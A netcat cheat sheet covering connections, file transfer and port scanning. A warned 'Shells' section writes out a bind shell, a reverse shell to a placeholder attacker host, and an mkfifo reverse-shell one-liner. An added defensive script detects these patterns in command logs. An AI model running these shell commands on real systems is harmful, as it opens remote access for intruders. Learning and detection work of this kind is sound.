
nc (Netcat) Command Cheat Sheet

nc is often referred to as the "Swiss Army knife" of networking tools. It reads and writes data across network connections using TCP or UDP.

Implementations:

  • netcat-traditional: The classic.
  • netcat-openbsd: Common on Debian/Ubuntu (supports IPv6, limited proxy options).
  • ncat (Nmap): The modern, feature-rich version (SSL support, proxies).


Synopsis

nc [options] [hostname] [port]

Client Mode

Connect to a Server

Connect to example.com on port 80.

nc example.com 80

Send HTTP Request manually

nc example.com 80
GET / HTTP/1.1
Host: example.com
(Press Enter twice)

Server Mode (Listen)

Start a Chat Server

  1. Server: Listen on port 1234.
    nc -l -p 1234
    
  2. Client: Connect to server.
    nc <server_ip> 1234
    
  3. Type text in either terminal; it appears in the other.

File Transfer

Sender (Client) -> Receiver (Server)

  1. Receiver: Listen and pipe to file.
    nc -l -p 1234 > received_file.zip
    
  2. Sender: Connect and pipe file.
    nc <receiver_ip> 1234 < original_file.zip
    

Note: Once the transfer is done, the connection might not close automatically. Use -w 1 (timeout) or press Ctrl+C.


Port Scanning

nmap is the better tool for scanning, but nc works for quick checks.

Scan Single Port

nc -zv 192.168.1.1 22

  • -z: Zero-I/O mode (scan only, don't send data).
  • -v: Verbose (show results).

Scan Range

nc -zv 192.168.1.1 20-80

UDP Scan (-u)

nc -zvu 192.168.1.1 53

Advanced: Shells

⚠️ Security Warning: Used by attackers for backdoors. Know this to defend against it.

Bind Shell (Server-side)

Execute /bin/bash when someone connects.

# Server (Victim)
nc -l -p 4444 -e /bin/bash
Attacker connects via nc victim_ip 4444 and gets a shell.

Reverse Shell (Client-side)

Connect TO the attacker and give them a shell. (Bypasses inbound firewall rules, because the connection is outbound.)

# Attacker (Server)
nc -l -p 4444

# Victim (Client)
nc <attacker_ip> 4444 -e /bin/bash

If -e is disabled (common on modern netcat):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attacker_ip> 4444 >/tmp/f
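
For the defensive side of this section, the following added example (not part of the original cheat sheet) classifies logged command lines, such as shell history or audit records, against the three patterns above: nc started with -e, the mkfifo relay, and a plain listener. The function names, verdict labels and sample lines are assumptions made for illustration; it also goes slightly beyond the page by recognising ncat's --exec long option and Debian's nc.traditional / nc.openbsd binary names.

```sh
# Added example: triage logged command lines for netcat shell patterns.
# Verdict labels and sample lines are illustrative assumptions.

# nc, ncat, netcat, or Debian's nc.traditional / nc.openbsd, as a whole word
NC='(^|[[:space:]/])(nc|ncat|netcat)(\.(traditional|openbsd))?[[:space:]]'
# -e (alone or in a flag cluster such as -lve) or ncat's --exec, after the nc word
EXEC='(.*[[:space:]])?(-[A-Za-z]*e|--exec)[[:space:]]'
# -l alone or inside a flag cluster such as -lvp
LISTEN='(.*[[:space:]])?-[A-Za-z]*l[A-Za-z]*([[:space:]]|$)'

has() { printf '%s\n' "$1" | grep -Eq "$2"; }

# Split on | ; & so a "-e" that belongs to another program in the same
# pipeline (grep -e ...) is never attributed to nc.
segments() { printf '%s\n' "$1" | tr '|;&' '\n\n\n'; }

# Print one verdict: fifo-relay, exec-shell, listener or ok.
classify_cmdline() {
    if has "$1" 'mkfifo[[:space:]]' && has "$1" 'sh[[:space:]]+-i' && has "$1" "$NC"; then
        echo fifo-relay      # named pipe + interactive shell + nc (-e workaround)
    elif segments "$1" | grep -Eq "$NC$EXEC"; then
        echo exec-shell      # program attached directly to the socket
    elif segments "$1" | grep -Eq "$NC$LISTEN"; then
        echo listener        # plain listener: chat, file transfer, or staging
    else
        echo ok
    fi
}

# Read command lines on stdin; print "verdict<TAB>line" for anything not ok.
scan_log() {
    while IFS= read -r line; do
        verdict=$(classify_cmdline "$line")
        [ "$verdict" = ok ] || printf '%s\t%s\n' "$verdict" "$line"
    done
}

# Constructed sample input (192.0.2.0/24 is a documentation range).
sample_log() {
    cat <<'EOF'
nc -zv 192.168.1.1 22
nc -l -p 1234 > received_file.zip
grep -e error app.log | nc 192.0.2.10 1234
/usr/bin/nc 192.0.2.10 4444 -e /bin/bash
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.0.2.10 4444 >/tmp/f
EOF
}
sample_log | scan_log
```

A "listener" verdict is not malicious by itself; it marks a line worth correlating with who ran it and what connected to the port.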

Notes

  • Timeouts: Use -w 5 to timeout after 5 seconds.
  • Persistence: nc -k -l 1234 keeps the server listening after a client disconnects (OpenBSD variant).